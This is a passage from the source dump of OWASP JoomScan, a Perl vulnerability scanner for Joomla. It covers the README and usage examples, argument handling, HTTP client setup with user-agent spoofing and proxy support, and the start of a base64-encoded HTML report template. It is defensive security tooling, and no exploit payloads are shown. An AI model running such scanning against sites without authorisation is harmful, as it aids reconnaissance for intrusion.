8 | [![Black Hat Arsenal USA](https://rawgit.com/toolswatch/badges/master/arsenal/usa/2018.svg)](http://www.toolswatch.org/2018/05/black-hat-arsenal-usa-2018-the-w0w-lineup/) 9 | [![Black Hat Arsenal ASIA](https://rawgit.com/toolswatch/badges/master/arsenal/asia/2018.svg)](http://www.toolswatch.org/2018/01/black-hat-arsenal-asia-2018-great-lineup/) 10 | 11 | 12 | 13 | 14 | ====== 15 | 16 | OWASP JoomScan Project 17 | ====== 18 | 19 | OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads. 20 |
21 | OWASP JoomScan is included in Kali Linux distributions. 22 | 23 | * **Read More**: https://www.secologist.com/open-source-projects 24 | 25 | ### WHY OWASP JOOMSCAN ? 26 | Automated ...
27 | *Version enumerator
28 | *Vulnerability enumerator (based on version)
29 | *Components enumerator (1209 most popular by default)
30 | *Components vulnerability enumerator (based on version)(+1030 exploit)
31 | *Firewall detector
32 | *Reporting to Text & HTML output
33 | *Finding common log files
34 | *Finding common backup files
35 | 36 | 37 | # INSTALL 38 | 39 | git clone https://github.com/rezasp/joomscan.git 40 | cd joomscan 41 | perl joomscan.pl 42 | 43 | For Docker installation and usage 44 | 45 | # Build the docker image 46 | docker build -t rezasp/joomscan . 47 | 48 | # Run a new docker container with reports directory mounted at the host 49 | docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan 50 | 51 | # For accessing the docker container you can run the following command 52 | docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan 53 | 54 | # JOOMSCAN ARGUMENTS 55 | 56 | Usage: joomscan.pl [options] 57 | 58 | --url | -u | The Joomla URL/domain to scan. 59 | --enumerate-components | -ec | Try to enumerate components. 60 | 61 | --cookie | Set cookie. 62 | --user-agent | -a | Use the specified User-Agent. 63 | --random-agent | -r | Use a random User-Agent. 64 | --timeout | set timeout. 65 | --about | About Author 66 | --update | Update to the latest version. 67 | --help | -h | This help screen. 68 | --version | Output the current version and exit. 69 | 70 | 71 | # OWASP JOOMSCAN USAGE EXAMPLES 72 | 73 | Do default checks...
74 | ```perl joomscan.pl --url www.example.com```
75 | or
76 | ```perl joomscan.pl -u www.example.com``` 77 |
78 |
79 | Enumerate installed components...
80 | ```perl joomscan.pl --url www.example.com --enumerate-components```
81 | or
82 | ```perl joomscan.pl -u www.example.com --ec```
83 |
84 | 85 | Set cookie
86 | ```perl joomscan.pl --url www.example.com --cookie "test=demo;"``` 87 |

88 | 89 | Set user-agent
90 | ```perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"```
91 | or
92 | ```perl joomscan.pl -u www.example.com -a "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"```
93 |

94 | 95 | Set random user-agent
96 | ```perl joomscan.pl -u www.example.com --random-agent```
97 | or
98 | ```perl joomscan.pl --url www.example.com -r```
99 |
100 | 101 | Set proxy
102 | ```perl joomscan.pl --url www.example.com --proxy http://127.0.0.1:8080```
103 | or
104 | ```perl joomscan.pl -u www.example.com --proxy https://127.0.0.1:443```
105 |

106 | 107 | Update Joomscan...
108 | ```perl joomscan.pl --update```

109 | 110 | 111 | # OWASP PAGE 112 | 113 | [https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) 114 | 115 | # GIT REPOSITORY 116 | 117 | [https://github.com/rezasp/joomscan](https://github.com/rezasp/joomscan) 118 | 119 | # ISSUES 120 | 121 | [https://github.com/rezasp/joomscan/issues](https://github.com/rezasp/joomscan/issues) 122 | 123 | # PROJECT LEADERS 124 | 125 | * Mohammad Reza Espargham [ reza[dot]espargham[at]owasp[dot]org ] 126 | * Ali Razmjoo [ ali[dot]razmjoo[at]owasp[dot]org ] 127 | 128 | 129 |

130 | OWASP JoomScan introduction (Youtube) 131 | 132 | [![OWASP JoomScan introduction](https://img.youtube.com/vi/Ik2CJ9LkuoI/0.jpg)](https://www.youtube.com/watch?v=Ik2CJ9LkuoI) 133 | -------------------------------------------------------------------------------- /core/compare.pl: -------------------------------------------------------------------------------- 1 | sub max { 2 | my $x = shift; 3 | my $y = shift; 4 | return ( $x > $y ? $x : $y ); 5 | } 6 | 7 | sub version_compare { 8 | my $ver1 = shift || 0; 9 | my $ver2 = shift || 0; 10 | my @v1 = split /[.+:~-]/, $ver1; 11 | my @v2 = split /[.+:~-]/, $ver2; 12 | 13 | for ( my $i = 0 ; $i < max( scalar(@v1), scalar(@v2) ) ; $i++ ) { 14 | 15 | # Add missing version parts if one string is shorter than the other 16 | # i.e. 0 should be lt 0.2.1 and not equal, so we append .0 17 | # -> 0.0.0 <=> 0.2.1 -> -1 18 | push( @v1, 0 ) unless defined( $v1[$i] ); 19 | push( @v2, 0 ) unless defined( $v2[$i] ); 20 | if ( int( $v1[$i] ) > int( $v2[$i] ) ) { 21 | return 1; 22 | } 23 | elsif ( int( $v1[$i] ) < int( $v2[$i] ) ) { 24 | return -1; 25 | } 26 | } 27 | return 0; 28 | } -------------------------------------------------------------------------------- /core/header.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use Term::ANSIColor; 4 | 5 | print color("YELLOW"); 6 | print q{ 7 | ____ _____ _____ __ __ ___ ___ __ _ _ 8 | (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( ) 9 | .-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) ( 10 | \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_) 11 | }; 12 | print color("red") . "\t\t\t(1337.today)" . color("reset"); 13 | print " 14 | 15 | --=[". color("BLUE") . "OWASP JoomScan". color("reset") ." 16 | +---++---==[Version : " 17 | . color("red"). "$version\n". color("reset") . " +---++---==[Update Date : [". color("red") . "$update". color("reset") . "] 18 | +---++---==[Authors : ". color("red") . "$author". color("reset")." 19 | --=[Code name : ". color("red") . "$codename". color("reset")."\n \@OWASP_JoomScan , \@rezesp , \@Ali_Razmjo0 , \@OWASP\n\n"; 20 | 21 | if(!defined $ARGV[0]){ 22 | 23 | print color("cyan"); 24 | printf "\n Usage: 25 | joomscan.pl 26 | joomscan.pl -u http://target.com/joomla 27 | joomscan.pl -m targets.txt 28 | 29 | 30 | Options: 31 | joomscan.pl --help\n\n"; 32 | print color("reset"); 33 | exit(1); 34 | } 35 | $cookie=1; 36 | $proxy=1; 37 | #Start help Function 38 | sub help 39 | { 40 | print color("cyan"); 41 | printf " 42 | 43 | Help : 44 | 45 | Usage: $0 [options] 46 | 47 | --url | -u | The Joomla URL/domain to scan. 48 | --mass | -m | Cycle through URLs provided in txt file 49 | --enumerate-components | -ec | Try to enumerate components. 50 | --joomla-version | -jv | Output target Joomla version and exit without further checks 51 | --no-report | -nr | Do not produce a report 52 | 53 | --cookie | Set cookie. 54 | --user-agent | -a | Use the specified User-Agent. 55 | --random-agent | -r | Use a random User-Agent. 56 | --timeout | Set timeout. 57 | --proxy=PROXY | Use a proxy to connect to the target URL 58 | Proxy example: --proxy http://127.0.0.1:8080 59 | https://127.0.0.1:443 60 | socks://127.0.0.1:414 61 | 62 | --about | About Author 63 | --update | Update to the latest version. 64 | --help | -h | This help screen. 65 | --version | Output the current joomscan version and exit. 66 | 67 | 68 | "; 69 | print color("reset"); 70 | exit(1); 71 | } 72 | sub about 73 | { 74 | print color("cyan"); 75 | printf " 76 | Author : $author 77 | Twitter : \@rezesp , \@Ali_Razmjo0 78 | Git repository : https://github.com/rezasp/joomscan/ 79 | Issues : https://github.com/rezasp/joomscan/issues 80 | \n\n"; 81 | print color("reset"); 82 | exit(1); 83 | } 84 | sub update 85 | { 86 | do "$mepath/core/update.pl"; 87 | print color("reset"); 88 | exit(1); 89 | } 90 | 91 | 92 | GetOptions( 93 | 'help|h' => sub { help(0) }, 94 | 'update' => sub { update(0) }, 95 | 'about' => sub { about(0) }, 96 | 'enumerate-components|ec' => sub { $components = 1 }, 97 | 'no-report|nr' => sub { $noreport = 1 }, 98 | 'joomla-version|jv' => sub { $jversion = 1 }, 99 | 'random-agent|r' => sub { $randomagent = 1 }, 100 | 'user-agent|a=s' => \$agent, 101 | 'timeout=s' => \$timeout, 102 | 'proxy=s' => \$proxy, 103 | 'cookie=s' => \$cookie, 104 | 'u|url=s' => \$target, 105 | 'm|mass=s' => \$urlfile, 106 | 'version' => sub { print "\n\nVersion : $version\n\n";exit; }, 107 | 108 | ); 109 | if(($target !~ /\S/)&&($urlfile !~ /\S/)){ 110 | print color("red"); 111 | print "[+] No target specified!\n\n"; 112 | print color("reset"); 113 | exit (1); 114 | } 115 | if($target !~ /^https?:\/\//) { $target = "http://$target"; }; 116 | 117 | #End help Function 118 | -------------------------------------------------------------------------------- /core/main.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use utf8; 4 | use open ':std', ':encoding(UTF-8)'; 5 | use Term::ANSIColor; 6 | 7 | my $can_regexp=1; 8 | eval "use Regexp::Common \"URI\""; 9 | if($@) { $can_regexp=0; } 10 | 11 | $ua = LWP::UserAgent->new(); 12 | $ua->protocols_allowed( [ 'http' ] ); 13 | if($target =~ /^https:\/\//) { 14 | my $can_https=1; 15 | eval "use LWP::Protocol::https"; 16 | if($@) { $can_https=0; } 17 | 18 | if ($can_https) { 19 | $ua->ssl_opts( 'verify_hostname' => 0 ); 20 | push @{ $ua->protocols_allowed }, 'https'; 21 | } else { 22 | print color("red"); 23 | print "[+] Target uses HTTPS, but module LWP::Protocol::https is not available!\n\n"; 24 | print color("reset"); 25 | if (!$urlfile) {exit (1);} else {next;} 26 | } 27 | } 28 | 29 | print color("blue"); 30 | 31 | $timeout = $timeout || 60; 32 | $ua->timeout($timeout); 33 | 34 | @weekday = ("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"); 35 | ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();; 36 | $year = $year + 1900; 37 | $mon += 1; 38 | $stime="$year-$mon-$mday $hour:$min:$sec $weekday[$wday]"; 39 | 40 | 41 | @uagnt=('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5' 42 | ,'Googlebot/2.1 ( http://www.googlebot.com/bot.html)' 43 | ,'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13' 44 | ,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)' 45 | ,'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51' 46 | ,'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620' 47 | ,'Debian APT-HTTP/1.3 (0.8.10.3)' 48 | ,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' 49 | ,'Googlebot/2.1 (+http://www.googlebot.com/bot.html)' 50 | ,'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)' 51 | ,'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)' 52 | ,'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)' 53 | ,'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)' 54 | ,'msnbot/1.1 (+http://search.msn.com/msnbot.htm)' 55 | ); 56 | 57 | $agent = $agent || 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5'; 58 | 59 | $agent = $uagnt[ rand @uagnt ] if($randomagent==1); 60 | 61 | $ua->agent($agent); 62 | 63 | if($proxy!=1){ 64 | if($proxy =~ /^https?/ or $proxy =~ /^socks?/ or $proxy =~ /^ftp/){ 65 | $ua->proxy([qw(http https)] => $proxy); 66 | } 67 | } 68 | 69 | $ua->cookie_jar({}) if($cookie!=1); 70 | $ua->default_header('Cookie'=> "$cookie") if($cookie!=1); 71 | 72 | 73 | our @dlog;our @tflog; 74 | 75 | our $log=""; 76 | sub dprint{ 77 | my ($in) = @_; 78 | $in =~ s/\/\//\//g; 79 | $in =~ s/http:\//http:\/\//g; 80 | $in =~ s/https:\//https:\/\//g; 81 | $#dlog++; 82 | $dlog[$#dlog]=$in; 83 | $in="\n[+] $in\n"; 84 | $log .= $in; 85 | print color("blue"); 86 | print "$in"; 87 | } 88 | sub tprint{ 89 | my ($in) = @_; 90 | $in =~ s/\/\//\//g; 91 | $in =~ s/http:\//http:\/\//g; 92 | $in =~ s/https:\//https:\/\//g; 93 | $#tflog++; 94 | $tflog[$#tflog]=$in; 95 | $in="[++] $in\n"; 96 | $log .= $in; 97 | print color("yellow"); 98 | print "$in"; 99 | print color("blue"); 100 | } 101 | sub fprint{ 102 | my ($in) = @_; 103 | $in =~ s/\/\//\//g; 104 | $in =~ s/http:\//http:\/\//g; 105 | $in =~ s/https:\//https:\/\//g; 106 | $#tflog++; 107 | $tflog[$#tflog]="1337false$in"; 108 | $in="[++] $in\n"; 109 | $log .= $in; 110 | print color("red"); 111 | print "$in"; 112 | print color("blue"); 113 | } 114 | 115 | print color("blue"); 116 | print "Processing $target ...\n\n\n"; -------------------------------------------------------------------------------- /core/report.pl: -------------------------------------------------------------------------------- 1 | use MIME::Base64; 2 | $reportencode = 'PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KCTx0aXRsZT4gJHRhcmdldCB8IE9XQVNQIEpvb21TY2FuIFJlc3VsdCA8L3RpdGxlPg0KDQoJPHN0eWxlPglJTUcuZGlzcGxheWVke2Rpc3BsYXk6YmxvY2s7bWFyZ2luLWxlZnQ6YXV0bzttYXJnaW4tcmlnaHQ6YXV0b31ib2R5e2ZvbnQtc2l6ZToxNnB4O2ZvbnQtZmFtaWx5OnRlcm1pbmFsO2NvbG9yOiNhYmFiYWI7YmFja2dyb3VuZC1jb2xvcjojZWFlZmY1O21hcmdpbjowfXRhYmxle2JvcmRlci1jb2xsYXBzZTpjb2xsYXBzZTt3aWR0aDoxMDAlO2NvbG9yOiMxMTE7dGFibGUtbGF5b3V0OmZpeGVkfXRye2JhY2tncm91bmQtY29sb3I6I2ZmZn10aHtjb2xvcjojZmZmO2JhY2tncm91bmQtY29sb3I6I2RmMzkzZDtib3JkZXI6MXB4c29saWQjMTA5MDU1O3BhZGRpbmc6M3B4O3ZlcnRpY2FsLWFsaWduOnRvcDt0ZXh0LWFsaWduOmxlZnR9dGR7Ym9yZGVyOjFweHNvbGlkI2Q0ZDRkNDtwYWRkaW5nOjVweDtwYWRkaW5nLXRvcDo3cHg7cGFkZGluZy1ib3R0b206N3B4O3ZlcnRpY2FsLWFsaWduOnRvcH1oMyxoNCxoNSxwcmV7Zm9udC1zaXplOjE2cHg7Zm9udC1mYW1pbHk6dGVybWluYWw7cGFkZGluZzowO21hcmdpbjowOztkaXNwbGF5OmlubGluZX1oMntjb2xvcjpsaW1lfWgze2NvbG9yOiMxMDkwNTV9cHtmb250LXNpemU6MTZweDttYXJnaW46MDtjb2xvcjojNjY2O2JhY2tncm91bmQ6I2NlZDhlMTtwYWRkaW5nOjdweDttYXJnaW46LTZweDttYXJnaW4tdG9wOjZweDttYXJnaW4tYm90dG9tOi04cHg7Y29sb3I6IzQ5NDk0OTtkaXNwbGF5Om5vbmV9aDV7Y29sb3I6bGltZX1wcmV7d2hpdGUtc3BhY2U6cHJlLXdyYXA7d29yZC13cmFwOmJyZWFrLXdvcmR9aDN7Y3Vyc29yOnBvaW50ZXJ9dHJ7Ym9yZGVyLWJvdHRvbToxcHggc29saWQgc2lsdmVyfQk8L3N0eWxlPgk8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CWZ1bmN0aW9uIGpvb21zY2FuKGlkLCBidG4pe2lmKGJ0bi5pbm5lckhUTUwuc3Vic3RyaW5nKDAsIDMpPT0iWytdIil7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoaWQpLnN0eWxlLmRpc3BsYXk9J2Jsb2NrJzsgYnRuLmlubmVySFRNTD1idG4uaW5uZXJIVE1MLnJlcGxhY2UoIlsrXSIsIlstXSIpO31lbHNlIGlmKGJ0bi5pbm5lckhUTUwuc3Vic3RyaW5nKDAsIDMpPT0iWy1dIil7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoaWQpLnN0eWxlLmRpc3BsYXk9J25vbmUnO2J0bi5pbm5lckhUTUw9YnRuLmlubmVySFRNTC5yZXBsYWNlKCJbLV0iLCJbK10iKTt9fQk8L3NjcmlwdD48L2hlYWQ+PGJvZHk+DQoJPGltZyBhbHQ9Ikpvb21TY2FuIiBjbGFzcz0iZGlzcGxheWVkIiBzcmM9ImRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBSXdBQUFDZ0NBWUFBQURlcm9SekFBQUFDWEJJV1hNQUFBc1RBQUFMRXdFQW1wd1lBQUFLVDJsRFExQlFhRzkwYjNOb2IzQWdTVU5ESUhCeWIyWnBiR1VBQUhqYW5WTm5WRlBwRmozMzN2UkNTNGlBbEV0dlVoVUlJRkpDaTRBVWtTWXFJUWtRU29naG9ka1ZVY0VSUlVVRUc4aWdpQU9Pam9DTUZWRXNESW9LMkFma0lhS09nNk9JaXNyNzRYdWphOWE4OStiTi9yWFhQdWVzODUyenp3ZkFDQXlXU0ROUk5ZQU1xVUllRWVDRHg4VEc0ZVF1UUlFS0pIQUFFQWl6WkNGei9TTUJBUGgrUER3cklzQUh2Z0FCZU5NTENBREFUWnZBTUJ5SC93L3FRcGxjQVlDRUFjQjBrVGhMQ0lBVUFFQjZqa0ttQUVCR0FZQ2RtQ1pUQUtBRUFHRExZMkxqQUZBdEFHQW5mK2JUQUlDZCtKbDdBUUJibENFVkFhQ1JBQ0FUWlloRUFHZzdBS3pQVm9wRkFGZ3dBQlJtUzhRNUFOZ3RBREJKVjJaSUFMQzNBTURPRUF1eUFBZ01BREJSaUlVcEFBUjdBR0RJSXlONEFJU1pBQlJHOGxjODhTdXVFT2NxQUFCNG1iSTh1U1E1UllGYkNDMXhCMWRYTGg0b3pra1hLeFEyWVFKaG1rQXV3bm1aR1RLQk5BL2c4OHdBQUtDUkZSSGdnL1A5ZU00T3JzN09ObzYyRGw4dDZyOEcveUppWXVQKzVjK3JjRUFBQU9GMGZ0SCtMQyt6R29BN0JvQnQvcUlsN2dSb1hndWdkZmVMWnJJUFFMVUFvT25hVi9OdytINDhQRVdoa0xuWjJlWGs1TmhLeEVKYlljcFhmZjVud2wvQVYvMXMrWDQ4L1BmMTRMN2lKSUV5WFlGSEJQamd3c3owVEtVY3o1SUpoR0xjNW85SC9MY0wvL3dkMHlMRVNXSzVXQ29VNDFFU2NZNUVtb3p6TXFVaWlVS1NLY1VsMHY5azR0OHMrd00rM3pVQXNHbytBWHVSTGFoZFl3UDJTeWNRV0hUQTR2Y0FBUEs3YjhIVUtBZ0RnR2lENGM5My8rOC8vVWVnSlFDQVprbVNjUUFBWGtRa0xsVEtzei9IQ0FBQVJLQ0JLckJCRy9UQkdDekFCaHpCQmR6QkMveGdOb1JDSk1UQ1FoQkNDbVNBSEhKZ0theUNRaWlHemJBZEttQXYxRUFkTk1CUmFJYVRjQTR1d2xXNERqMXdEL3BoQ0o3QktMeUJDUVJCeUFnVFlTSGFpQUZpaWxnampnZ1htWVg0SWNGSUJCS0xKQ0RKaUJSUklrdVJOVWd4VW9wVUlGVklIZkk5Y2dJNWgxeEd1cEU3eUFBeWd2eUd2RWN4bElHeVVUM1VETFZEdWFnM0dvUkdvZ3ZRWkhReG1vOFdvSnZRY3JRYVBZdzJvZWZRcTJnUDJvOCtROGN3d09nWUJ6UEViREF1eHNOQ3NUZ3NDWk5qeTdFaXJBeXJ4aHF3VnF3RHU0bjFZOCt4ZHdRU2dVWEFDVFlFZDBJZ1lSNUJTRmhNV0U3WVNLZ2dIQ1EwRWRvSk53a0RoRkhDSnlLVHFFdTBKcm9SK2NRWVlqSXhoMWhJTENQV0VvOFRMeEI3aUVQRU55UVNpVU15SjdtUUFrbXhwRlRTRXRKRzBtNVNJK2tzcVpzMFNCb2prOG5hWkd1eUJ6bVVMQ0FyeUlYa25lVEQ1RFBrRytRaDhsc0tuV0pBY2FUNFUrSW9Vc3BxU2hubEVPVTA1UVpsbURKQlZhT2FVdDJvb1ZRUk5ZOWFRcTJodGxLdlVZZW9FelIxbWpuTmd4WkpTNld0b3BYVEdtZ1hhUGRwcitoMHVoSGRsUjVPbDlCWDBzdnBSK2lYNkFQMGR3d05oaFdEeDRobktCbWJHQWNZWnhsM0dLK1lUS1laMDRzWngxUXdOekhybU9lWkQ1bHZWVmdxdGlwOEZaSEtDcFZLbFNhVkd5b3ZWS21xcHFyZXFndFY4MVhMVkkrcFhsTjlya1pWTTFQanFRblVscXRWcXAxUTYxTWJVMmVwTzZpSHFtZW9iMVEvcEg1Wi9Za0dXY05NdzA5RHBGR2dzVi9qdk1ZZ0MyTVpzM2dzSVdzTnE0WjFnVFhFSnJITjJYeDJLcnVZL1IyN2l6MnFxYUU1UXpOS00xZXpVdk9VWmo4SDQ1aHgrSngwVGdubktLZVg4MzZLM2hUdktlSXBHNlkwVExreFpWeHJxcGFYbGxpclNLdFJxMGZydlRhdTdhZWRwcjFGdTFuN2dRNUJ4MG9uWENkSFo0L09CWjNuVTlsVDNhY0tweFpOUFRyMXJpNnFhNlVib2J0RWQ3OXVwKzZZbnI1ZWdKNU1iNmZlZWIzbitoeDlMLzFVL1czNnAvVkhERmdHc3d3a0J0c016aGc4eFRWeGJ6d2RMOGZiOFZGRFhjTkFRNlZobFdHWDRZU1J1ZEU4bzlWR2pVWVBqR25HWE9NazQyM0diY2FqSmdZbUlTWkxUZXBON3BwU1RibW1LYVk3VER0TXg4M016YUxOMXBrMW16MHgxekxubStlYjE1dmZ0MkJhZUZvc3RxaTJ1R1ZKc3VSYXBsbnV0cnh1aFZvNVdhVllWVnBkczBhdG5hMGwxcnV0dTZjUnA3bE9rMDZybnRabnc3RHh0c20ycWJjWnNPWFlCdHV1dG0yMmZXRm5ZaGRudDhXdXcrNlR2Wk45dW4yTi9UMEhEWWZaRHFzZFdoMStjN1J5RkRwV090NmF6cHp1UDMzRjlKYnBMMmRZenhEUDJEUGp0aFBMS2NScG5WT2IwMGRuRjJlNWM0UHppSXVKUzRMTExwYytMcHNieHQzSXZlUktkUFZ4WGVGNjB2V2RtN09id3UybzI2L3VOdTVwN29mY244dzBueW1lV1ROejBNUElRK0JSNWRFL0M1K1ZNR3Zmckg1UFEwK0JaN1huSXk5akw1RlhyZGV3dDZWM3F2ZGg3eGMrOWo1eW4rTSs0enczM2pMZVdWL01OOEMzeUxmTFQ4TnZubCtGMzBOL0kvOWsvM3IvMFFDbmdDVUJad09KZ1VHQld3TDcrSHA4SWIrT1B6cmJaZmF5MmUxQmpLQzVRUlZCajRLdGd1WEJyU0ZveU95UXJTSDM1NWpPa2M1cERvVlFmdWpXMEFkaDVtR0x3MzRNSjRXSGhWZUdQNDV3aUZnYTBUR1hOWGZSM0VOejMwVDZSSlpFM3B0bk1VODVyeTFLTlNvK3FpNXFQTm8zdWpTNlA4WXVabG5NMVZpZFdFbHNTeHc1TGlxdU5tNXN2dC84N2ZPSDRwM2lDK043RjVndnlGMXdlYUhPd3ZTRnB4YXBMaElzT3BaQVRJaE9PSlR3UVJBcXFCYU1KZklUZHlXT0NubkNIY0puSWkvUk50R0kyRU5jS2g1TzhrZ3FUWHFTN0pHOE5Ya2t4VE9sTE9XNWhDZXBrTHhNRFV6ZG16cWVGcHAySUcweVBUcTlNWU9Ta1pCeFFxb2hUWk8yWitwbjVtWjJ5NnhsaGJMK3hXNkx0eThlbFFmSmE3T1FyQVZaTFFxMlFxYm9WRm9vMXlvSHNtZGxWMmEvelluS09aYXJuaXZON2N5enl0dVFONXp2bi8vdEVzSVM0WksycFlaTFZ5MGRXT2E5ckdvNXNqeHhlZHNLNHhVRks0WldCcXc4dUlxMkttM1ZUNnZ0VjVldWZyMG1lazFyZ1Y3QnlvTEJ0UUZyNnd0VkN1V0ZmZXZjMSsxZFQxZ3ZXZCsxWWZxR25ScytGWW1LcmhUYkY1Y1ZmOWdvM0hqbEc0ZHZ5citaM0pTMHFhdkV1V1RQWnRKbTZlYmVMWjViRHBhcWwrYVhEbTROMmRxMERkOVd0TzMxOWtYYkw1Zk5LTnU3ZzdaRHVhTy9QTGk4WmFmSnpzMDdQMVNrVlBSVStsUTI3dExkdFdIWCtHN1I3aHQ3dlBZMDdOWGJXN3ozL1Q3SnZ0dFZBVlZOMVdiVlpmdEorN1AzUDY2SnF1bjRsdnR0WGExT2JYSHR4d1BTQS8wSEl3NjIxN25VMVIzU1BWUlNqOVlyNjBjT3h4KysvcDN2ZHkwTk5nMVZqWnpHNGlOd1JIbms2ZmNKMy9jZURUcmFkb3g3ck9FSDB4OTJIV2NkTDJwQ212S2FScHRUbXZ0YllsdTZUOHcrMGRicTNucjhSOXNmRDV3MFBGbDVTdk5VeVduYTZZTFRrMmZ5ejR5ZGxaMTlmaTc1M0dEYm9yWjc1MlBPMzJvUGIrKzZFSFRoMGtYL2krYzd2RHZPWFBLNGRQS3kyK1VUVjdoWG1xODZYMjNxZE9vOC9wUFRUOGU3bkx1YXJybGNhN251ZXIyMWUyYjM2UnVlTjg3ZDlMMTU4UmIvMXRXZU9UM2R2Zk42Yi9mRjkvWGZGdDErY2lmOXpzdTcyWGNuN3EyOFQ3eGY5RUR0UWRsRDNZZlZQMXYrM05qdjNIOXF3SGVnODlIY1IvY0doWVBQL3BIMWp3OURCWStaajh1R0RZYnJuamcrT1RuaVAzTDk2ZnluUTg5a3p5YWVGLzZpL3N1dUZ4WXZmdmpWNjlmTzBaalJvWmZ5bDVPL2JYeWwvZXJBNnhtdjI4YkN4aDYreVhnek1WNzBWdnZ0d1hmY2R4M3ZvOThQVCtSOElIOG8vMmo1c2ZWVDBLZjdreG1Uay84RUE1anovR016TGRzQUFFY2phVlJZZEZoTlREcGpiMjB1WVdSdlltVXVlRzF3QUFBQUFBQThQM2h3WVdOclpYUWdZbVZuYVc0OUl1Kzd2eUlnYVdROUlsYzFUVEJOY0VObGFHbEllbkpsVTNwT1ZHTjZhMk01WkNJL1BnbzhlRHA0YlhCdFpYUmhJSGh0Ykc1ek9uZzlJbUZrYjJKbE9tNXpPbTFsZEdFdklpQjRPbmh0Y0hSclBTSkJaRzlpWlNCWVRWQWdRMjl5WlNBMUxqVXRZekF4TkNBM09TNHhOVEUwT0RFc0lESXdNVE12TURNdk1UTXRNVEk2TURrNk1UVWdJQ0FnSUNBZ0lDSStDaUFnSUR4eVpHWTZVa1JHSUhodGJHNXpPbkprWmowaWFIUjBjRG92TDNkM2R5NTNNeTV2Y21jdk1UazVPUzh3TWk4eU1pMXlaR1l0YzNsdWRHRjRMVzV6SXlJK0NpQWdJQ0FnSUR4eVpHWTZSR1Z6WTNKcGNIUnBiMjRnY21SbU9tRmliM1YwUFNJaUNpQWdJQ0FnSUNBZ0lDQWdJSGh0Ykc1ek9uaHRjRDBpYUhSMGNEb3ZMMjV6TG1Ga2IySmxMbU52YlM5NFlYQXZNUzR3THlJS0lDQWdJQ0FnSUNBZ0lDQWdlRzFzYm5NNlpHTTlJbWgwZEhBNkx5OXdkWEpzTG05eVp5OWtZeTlsYkdWdFpXNTBjeTh4TGpFdklnb2dJQ0FnSUNBZ0lDQWdJQ0I0Yld4dWN6cDRiWEJOVFQwaWFIUjBjRG92TDI1ekxtRmtiMkpsTG1OdmJTOTRZWEF2TVM0d0wyMXRMeUlLSUNBZ0lDQWdJQ0FnSUNBZ2VHMXNibk02YzNSRmRuUTlJbWgwZEhBNkx5OXVjeTVoWkc5aVpTNWpiMjB2ZUdGd0x6RXVNQzl6Vkhsd1pTOVNaWE52ZFhKalpVVjJaVzUwSXlJS0lDQWdJQ0FnSUNBZ0lDQWdlRzFzYm5NNmMzUlNaV1k5SW1oMGRIQTZMeTl1Y3k1aFpHOWlaUzVqYjIwdmVHRndMekV1TUM5elZIbHdaUzlTWlhOdmRYSmpaVkpsWmlNaUNpQWdJQ0FnSUNBZ0lDQWdJSGh0Ykc1ek9uQm9iM1J2YzJodmNEMGlhSFIwY0RvdkwyNXpMbUZrYjJKbExtTnZiUzl3YUc5MGIzTm9iM0F2TVM0d0x5SUtJQ0FnSUNBZ0lDQWdJQ0FnZUcxc2JuTTZkR2xtWmowaWFIUjBjRG92TDI1ekxtRmtiMkpsTG1OdmJTOTBhV1ptTHpFdU1DOGlDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHNXpPbVY0YVdZOUltaDBkSEE2THk5dWN5NWhaRzlpWlM1amIyMHZaWGhwWmk4eExqQXZJajRLSUNBZ0lDQWdJQ0FnUEhodGNEcERjbVZoZEc5eVZHOXZiRDVCWkc5aVpTQlFhRzkwYjNOb2IzQWdRME1nS0UxaFkybHVkRzl6YUNrOEwza